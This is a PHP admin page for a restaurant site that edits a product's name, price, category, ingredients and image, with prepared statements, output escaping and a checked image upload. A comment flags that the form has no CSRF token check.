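<?php
// Admin page: edit an existing product (name, price, category, ingredients, image).
// Relies on $conn (a PDO connection) coming from ../components/connect.php and on
// an admin session established by admin_login.php.
include '../components/connect.php';

session_start();

// Redirect unauthenticated users and STOP here. Without the exit() the rest of
// the script (including the UPDATE statements below) would still run for an
// anonymous request, because header() does not end execution.
if (!isset($_SESSION['admin_id'])) {
    header('location:admin_login.php');
    exit();
}
$admin_id = $_SESSION['admin_id'];

// Mirror of the deprecated FILTER_SANITIZE_STRING (strip tags, encode quotes),
// so newly stored values keep the same shape as the rows already in the table.
$clean = static function ($value) {
    return str_replace(['"', "'"], ['&#34;', '&#39;'], strip_tags((string) $value));
};

// HTML-escape for output. double_encode=false keeps the already-encoded quotes
// produced by $clean from turning into a literal "&#34;" on screen.
$esc = static function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false);
};

// Only the categories that are in use by at least one product are offered.
$categories = $conn->query(
    "SELECT c.* FROM categories c INNER JOIN products p ON c.id = p.category GROUP BY c.id, c.name ORDER BY c.name"
)->fetchAll(PDO::FETCH_ASSOC);

$message = [];

// NOTE(review): no CSRF token is checked on this form; confirm whether
// connect.php / admin_header.php provide one before relying on it.
if (isset($_POST['update'])) {
    $pid         = (int) ($_POST['pid'] ?? 0);
    $name        = $clean($_POST['name'] ?? '');
    $description = $clean($_POST['description'] ?? '');

    // Accept "12,50" as well as "12.50" and store with exactly two decimals.
    $price = $clean($_POST['price'] ?? '0');
    $price = number_format((float) str_replace(',', '.', $price), 2, '.', '');

    // Category is either an existing id from the select box or a new name
    // typed into "new_category" (which wins when present).
    $new_category = trim((string) ($_POST['new_category'] ?? ''));
    if ($new_category !== '') {
        $check_cat = $conn->prepare("SELECT id FROM categories WHERE name = ?");
        $check_cat->execute([$new_category]);
        $existing = $check_cat->fetch(PDO::FETCH_ASSOC);
        if ($existing) {
            $category_id = (int) $existing['id'];
        } else {
            $insert_cat = $conn->prepare("INSERT INTO categories (name) VALUES (?)");
            $insert_cat->execute([$new_category]);
            $category_id = (int) $conn->lastInsertId();
        }
    } else {
        $category_id = (int) ($_POST['category'] ?? 0);
    }

    $update_product = $conn->prepare(
        "UPDATE `products` SET name = ?, category = ?, price = ?, description = ? WHERE id = ?"
    );
    $update_product->execute([$name, $category_id, $price, $description, $pid]);
    $message[] = 'Comida Actualizada!';

    // Optional image replacement. The client-supplied file name is never used
    // to build a path: the extension is checked against an allow-list, the
    // content is sniffed with getimagesize(), and a random server-side name is
    // generated. The old file is looked up from the database rather than taken
    // from a hidden form field, so only this product's own image can be removed.
    $upload = $_FILES['image'] ?? null;
    if ($upload !== null && (int) $upload['error'] !== UPLOAD_ERR_NO_FILE) {
        $image_dir     = '../uploaded_img/';
        $allowed_mimes = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/webp' => 'webp'];
        $allowed_exts  = ['jpg', 'jpeg', 'png', 'webp'];

        $ext  = strtolower(pathinfo((string) $upload['name'], PATHINFO_EXTENSION));
        $mime = '';
        if ((int) $upload['error'] === UPLOAD_ERR_OK && is_uploaded_file($upload['tmp_name'])) {
            $info = getimagesize($upload['tmp_name']);
            $mime = is_array($info) ? (string) $info['mime'] : '';
        }

        if ((int) $upload['error'] !== UPLOAD_ERR_OK) {
            $message[] = 'Error al subir la imágen!';
        } elseif ((int) $upload['size'] > 2000000) {
            $message[] = 'La imágen es demasiado grande!';
        } elseif (!isset($allowed_mimes[$mime]) || !in_array($ext, $allowed_exts, true)) {
            $message[] = 'Formato de imágen no permitido!';
        } else {
            $new_name = bin2hex(random_bytes(8)) . '.' . $allowed_mimes[$mime];

            // Move the file first; only point the row at it once it exists on disk.
            if (move_uploaded_file($upload['tmp_name'], $image_dir . $new_name)) {
                $old = $conn->prepare("SELECT image FROM `products` WHERE id = ?");
                $old->execute([$pid]);
                $old_image = basename((string) ($old->fetchColumn() ?: ''));

                $update_image = $conn->prepare("UPDATE `products` SET image = ? WHERE id = ?");
                $update_image->execute([$new_name, $pid]);

                if ($old_image !== '' && $old_image !== $new_name && is_file($image_dir . $old_image)) {
                    unlink($image_dir . $old_image);
                }
                $message[] = 'Imágen actualizada!';
            } else {
                $message[] = 'No se pudo guardar la imágen!';
            }
        }
    }

    header('location:products.php');
    exit();
}
?>
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Actualizar Comida</title>
    <link rel="icon" href="../images/favicon.png" type="image/x-icon">
    <!-- font awesome cdn link -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">
    <!-- custom css file link -->
    <link rel="stylesheet" href="../css/admin_style.css">
</head>
<!-- single <body> element; the original emitted two -->
<body style="background-image: url('../images/background1.png'); background-size: cover; background-position: center; background-repeat: no-repeat;">

<?php include '../components/admin_header.php' ?>

<!-- update product section starts -->
<section class="update-product">
    <h1 class="heading">Actualizar Comida</h1>

<?php
$update_id = (int) ($_GET['update'] ?? 0);
$show_products = $conn->prepare("SELECT * FROM `products` WHERE id = ?");
$show_products->execute([$update_id]);
if ($show_products->rowCount() > 0) {
    while ($fetch_products = $show_products->fetch(PDO::FETCH_ASSOC)) {
?>
    <form action="" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="pid" value="<?= (int) $fetch_products['id']; ?>">
        <img src="../uploaded_img/<?= $esc($fetch_products['image']); ?>" alt="">
        <span>Nombre</span>
        <input type="text" required placeholder="enter product name" name="name" maxlength="100" class="box" value="<?= $esc($fetch_products['name']); ?>">
        <span>Precio</span>
        <!-- pattern uses single backslashes: inside an HTML attribute "\\d" is two literal backslashes -->
        <input type="number" min="0" max="9999999999" step="0.01" required placeholder="enter product price" name="price" class="box" inputmode="decimal" pattern="^\d+(\.\d{1,2})?$" value="<?= $esc($fetch_products['price']); ?>">
        <span>Seleccione Categoría</span>
        <select name="category" class="box" id="categorySelectForm" required onchange="toggleNewCategory(this)">
            <option value="" disabled>Seleccione Categoría</option>
            <?php foreach ($categories as $cat): ?>
            <option value="<?= (int) $cat['id'] ?>" <?= (int) $cat['id'] === (int) $fetch_products['category'] ? 'selected' : '' ?>><?= $esc($cat['name']) ?></option>
            <?php endforeach; ?>
            <option value="new">Nueva categoría...</option>
        </select>
        <input type="text" name="new_category" id="newCategoryInput" class="box" placeholder="Nombre de la nueva categoría" style="display:none;">
        <span>Ingredientes</span>
        <textarea name="description" placeholder="Ingrese los ingredientes" class="box" maxlength="1000"><?= $esc($fetch_products['description']); ?></textarea>
        <span>Imágen</span>
        <input type="file" name="image" class="box" accept="image/jpg, image/jpeg, image/png, image/webp">
        <div class="flex-btn">
            <input type="submit" value="Actualizar" class="btn" name="update">
            <a href="products.php" class="option-btn">Regresar</a>
        </div>
    </form>
<?php
    }
} else {
    echo '<p class="empty">no products added yet!</p>';
}
?>
</section>
<!-- update product section ends -->

<!-- custom js file link -->
<script src="../js/admin_script.js"></script>
<script>
// Show the free-text category field only when "Nueva categoría..." is chosen,
// and make it required in that case so the form cannot submit an empty name.
function toggleNewCategory(sel) {
    var input = document.getElementById('newCategoryInput');
    if (sel.value === 'new') {
        input.style.display = 'block';
        input.required = true;
    } else {
        input.style.display = 'none';
        input.required = false;
    }
}
</script>
</body>
</html>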